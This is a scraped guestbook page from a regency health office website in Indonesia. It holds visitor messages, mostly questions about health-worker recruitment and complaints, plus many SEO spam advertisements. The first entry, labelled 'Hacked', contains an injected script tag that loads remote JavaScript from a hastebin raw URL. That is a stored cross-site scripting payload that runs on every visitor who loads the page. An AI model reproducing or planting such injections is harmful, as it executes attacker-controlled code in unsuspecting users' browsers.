Halaman Utama E-mail Peta Situs Kontak Kami
  Newsflash  
Lihat Buku Tamu
Menampilkan 1 - 30 dari 578 Hasilnya Isi Buku Tamu
Nama Pesan
Hacked
kamksd
Dikirimkan pada Thursday, 16 February 2017 14:27 IP 180.249.235.162 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.19.2883.75 Safari/537.36
<script type="text/javascript" src="https://hastebin.com/raw/oqigucucoh.js"></script>
  RatingRatingRatingRatingRating
Flaxseed Oil
Indonesia
Dikirimkan pada Friday, 27 January 2017 21:12 Lihat Websitenya IP 180.253.58.135 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Semoga bisa terus menyajikan data dan informasi yang dibutuhkan warga Bandung.
  RatingRatingRatingRatingRating
irawan
Banjaran
Dikirimkan pada Wednesday, 25 January 2017 07:13 IP 182.253.123.53 Mozilla/5.0 (Windows NT 5.1; rv:50.0) Gecko/20100101 Firefox/50.0
Tolong check n recheck no tilpon yang tersaji pada internet. tadi saya calling ke no 022-25897521 TIDAK TERSAMBUNG.
Tks

Irawan
  RatingRatingRatingRatingRating
Obat Ginjal Bengkak
Indonesia
Dikirimkan pada Tuesday, 24 January 2017 04:35 Lihat Websitenya IP 110.136.146.237 Mozilla/5.0 (Windows NT 6.1; rv:50.0) Gecko/20100101 Firefox/50.0
I was very impressed with you. website you create highly qualified and highly original contents. Thank you for sharing and I hope this website you manage to be the best
  RatingRatingRatingRatingRating
Obat Varises

Dikirimkan pada Thursday, 19 January 2017 06:36 Lihat Websitenya IP 180.246.30.228 Mozilla/5.0 (Windows NT 6.1; rv:50.0) Gecko/20100101 Firefox/50.0
Your website is very interesting, it is very meaningful and inspirational. I think your website deserves to be the number one. hopefully it could be real. Thank you in advance for own variety. I wish all of you is given a long life in order to continue working.
  RatingRatingRatingRatingRating
jasa cleaning service
tangerang
Dikirimkan pada Saturday, 14 January 2017 07:20 Lihat Websitenya IP 114.120.235.70 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
good news
  RatingRatingRatingRatingRating
khasiat lasoul sleeping mask
jakarta
Dikirimkan pada Saturday, 14 January 2017 06:35 Lihat Websitenya IP 114.120.235.70 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
good news
  RatingRatingRatingRatingRating
jual bibit tanaman sirsak
nganjuk
Dikirimkan pada Friday, 06 January 2017 06:31 Lihat Websitenya IP 114.120.237.0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
great article
  RatingRatingRatingRatingRating
Les Privat Bahasa Inggris untuk Karyawan
indonesia
Dikirimkan pada Tuesday, 03 January 2017 01:54 Lihat Websitenya IP 114.120.236.85 Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0
Shocked nice post.
  RatingRatingRatingRatingRating
game gratis
palembang
Dikirimkan pada Wednesday, 28 December 2016 02:58 Lihat Websitenya IP 114.121.235.83 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
terima kasih informasinya
  RatingRatingRatingRatingRating
alat pembesar penis

Dikirimkan pada Friday, 23 December 2016 02:54 Lihat Websitenya IP 114.120.235.171 Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0
good job.
  RatingRatingRatingRatingRating
Johan
Bandung
Dikirimkan pada Thursday, 08 December 2016 23:14 IP 114.121.236.235 Mozilla/5.0 (Linux; Android 6.0; Redmi Note 4 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.85 Mobile Safari/537.36
Syarat pengajuan PIRT. Apa bisa dengan mengambil produk lain laku mengemas sendiri saya bisa mengajukan PIRT
  RatingRatingRatingRatingRating
obat lidah berjamur
tasikmalaya
Dikirimkan pada Wednesday, 07 December 2016 02:13 Lihat Websitenya IP 36.72.112.60 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
Sukses terus yah
  RatingRatingRatingRatingRating
rental mobil solo
surakarta
Dikirimkan pada Tuesday, 06 December 2016 04:03 Lihat Websitenya IP 180.246.216.148 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36

Jangan lupa juga Anda harus bertanya berapa banyak owest biaya yang ada pada daftar harga sewa mobil Solo dalam rangka untuk dikreditkan dengan ketersediaan anggaran yang dimiliki. Ini adalah beberapa hal yang berkaitan dengan kendaraan yang dapat Anda gunakan ketika mengunjungi Candi Sukuh, selanjutnya akan dijelaskan tentang berbagai hal yang dapat Anda temui ketika mengunjungi candi ini. Jika dilihat sepintas, pembangunan candi ini dapat dikatakan cukup sederhana dibandingkan dengan sejumlah kuil lainnya yang berada di wilayah Jawa Tengah, seperti, Prambanan dan Candi Borobudur.
  RatingRatingRatingRatingRating
yanie
banjaran
Dikirimkan pada Saturday, 03 December 2016 03:38 IP 180.253.19.16 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
saya mempertanyakan kredibilitas UNPAD sebagai tim seleksi penerimaan pegawai BLUD,,,untuk STR dan kopetensi perawat bahwa untuk perawat yang membuatan STR tahun 2012 belum ada kebijakan uji kompetensi,,,sedangkan STR pun Masih Berlaku,,,,sehingga saya di nyatakan tidak lulus verifikasi padahal persayaratan saya memenuhi standar....tolong di kaji kembali unpad sebagai tim seleksi
  RatingRatingRatingRatingRating
dini
soreang
Dikirimkan pada Friday, 02 December 2016 08:20 IP 120.188.32.172 Mozilla/5.0 (Linux; Android 4.4.2; SM-G355H Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Mobile Safari/537.36
Kecewa sama seleksi penerimaan blud non-pns
Apkah ada kriteria khusus lagi untuk lulus verifikasi, kami banyak yang tidak lulus verifikasi padahal syarat sudah sesuai semua, apakah harus lulusan universitas negeri baru bisa lolos?
  RatingRatingRatingRatingRating
Yan
Bandung
Dikirimkan pada Thursday, 01 December 2016 13:11 IP 112.215.152.142 Mozilla/5.0 (Linux; Android 5.1.1; Redmi Note 3 Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36
Ass, min kapan pengumuman seleksi admistrasinya ? Katanya tgl 1-2 desember, tp sampai saat ini blm ada berita ? Tolong jadwal sesuai aturan yang sudah di tetapkan, bila ada perubahan waktu,pasang berita di web. Terima kasih
  RatingRatingRatingRatingRating
Lisna
Bandung
Dikirimkan pada Wednesday, 30 November 2016 22:32 IP 180.214.233.7 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.15 Safari/537.36
pendaftaran kerja onlinenya gak lulus seleksi tahap satu gara - gara gada surat akreditasi kampusnya, soalnya pas aku cari bank ptn secara online kok gak muncul nama kampus aku, sedangkan mo bikin manual yah lama lah prosesnya, keburu abis waktunya. hm terus surat tanda register juga kurang paham, jadi divalidasinya sistemnya gagal, hm, ya sudah gapapa.
  RatingRatingRatingRatingRating
Moch Romadhon R
Bangkalan
Dikirimkan pada Wednesday, 30 November 2016 04:32 IP 112.215.154.128 Mozilla/5.0 (Linux; Android 5.0.2; Redmi Note 2 Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.85 Mobile Safari/537.36
Assalamu alaikum, selamat pagi
Saya Romadhon ingin menanyakan setelah ujian apakah ada proses seleksi selanjutnya ataukah hanya di ujian saja?
terima kasih
  RatingRatingRatingRatingRating
Rissa mega Putri

Dikirimkan pada Monday, 28 November 2016 22:33 IP 112.215.65.123 Mozilla/5.0 (Linux; Android 5.0.2; Redmi Note 3 Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.124 Mobile Safari/537.36
Selamat pagi, saya ingin menanyakan tentang pendaftaran online pegawai BLUD non cpns.. saya lulus kuliah tahun 2010.. sudah ikut pemutihan STR, sudah punya STR tapi tidak mempunyai sertifikat kompetensi yg diminta. Sedangkan di pendaftaran via online wajib diisi.. apakah saya tetap bisa ikut mendaftar? Terimakasih atas informasinya
  RatingRatingRatingRatingRating
wina yulistiana
brebes jawa tengah
Dikirimkan pada Friday, 25 November 2016 10:28 IP 114.121.236.194 Mozilla/5.0 (Linux; U; Android 4.2.2; id-id; T1J Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Saya mau bertanya kalau pendaftaran calon blud d bandung d buka sampai kpn ya?
Terima kasih.
  RatingRatingRatingRatingRating
putri rahmawati
gresik
Dikirimkan pada Thursday, 24 November 2016 19:59 IP 112.215.172.177 Mozilla/5.0 (Windows NT 6.3; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Selamat pagi, saya ingin menanyakan terkait penerimaan pegawai BLUD non PNS tidak ada formasi untuk S1 Bidan Profesi, apakah tetap tidak diperkenankanuntk mendaftar ataukah diperkenankan mendaftar dengan formasi D3 akantetapi ijaszah S1?
Atas perhatiannya saya ucapkan terima kasih
  RatingRatingRatingRatingRating
Dewisria8
Sukabumi
Dikirimkan pada Tuesday, 22 November 2016 12:46 IP 120.188.65.106 Mozilla/5.0 (Linux; Android 5.1.1; Coolpad A8 Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.76 Mobile Safari/537.36
Ijin bertanya, apakah ada rekrutmen untuk PTT dan BLUD di kab.bandung di tahun 2016 ini pak? Mohon share infonya
Terimakasih
  RatingRatingRatingRatingRating
Asti Rahmawati
Rancaekek
Dikirimkan pada Tuesday, 22 November 2016 11:08 IP 114.79.13.145 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
kapanbuka cpns untuk lulusan s1 farmasi
  RatingRatingRatingRatingRating
Gin Gin Firdiani Lestari Fahsya
Bandung
Dikirimkan pada Wednesday, 16 November 2016 22:42 IP 114.121.235.181 Mozilla/5.0 (Linux; Android 5.0; ASUS_Z008 Build/LRX21V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/49.0.2623.108 Mobile Safari/537.36
Smile kapan dibuka lagi cpns untuk farmasi s1 ?
  RatingRatingRatingRatingRating
Eneng Aidah
Cipeundeuy, bandung barat
Dikirimkan pada Wednesday, 16 November 2016 06:58 IP 112.215.200.160 Mozilla/5.0 (Linux; Android 4.2.2; vivo Y28 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.138 Mobile Safari/537.36 OPR/22.0.1485.78487
:Smile
  RatingRatingRatingRatingRating
telly iryanti
nagreg
Dikirimkan pada Monday, 14 November 2016 11:50 IP 124.153.33.2 Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) GSA/10.0.63022 Mobile/11D257 Safari/9537.53
mohon info cpns untuk rekam medis,, terima kasih
  RatingRatingRatingRatingRating
adi harmoko
cimahi
Dikirimkan pada Friday, 11 November 2016 03:02 IP 180.253.234.234 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
selamat siang admin. saya denger akan ada rekrutmen untuk dokter perawat serta tenaga medis. boleh tahu kapan infonya mind? saya bisa kontak kemana untuk info yg valid serta continue
  RatingRatingRatingRatingRating
Jasa Review Murah
Pemalang
Dikirimkan pada Sunday, 30 October 2016 07:04 Lihat Websitenya IP 114.121.234.251 Mozilla/5.0 (Windows NT 6.1; rv:49.0) Gecko/20100101 Firefox/49.0
sangat melelahkan hari ini.
  RatingRatingRatingRatingRating
Tali Tambang Ud Samudra Jaya
surabaya
Dikirimkan pada Friday, 28 October 2016 08:05 Lihat Websitenya IP 114.121.239.93 Mozilla/5.0 (Windows NT 6.1; rv:49.0) Gecko/20100101 Firefox/49.0
Senang bisa ikutan Progam Hidup sehat dehSmile
  RatingRatingRatingRatingRating

<< Mulai < Sebelumnya 1 2 3 4 5 6 7 8 9 10 Berikutnya > Akhir >>
 
Hak Cipta © Dinas Kesehatan Kabupaten Bandung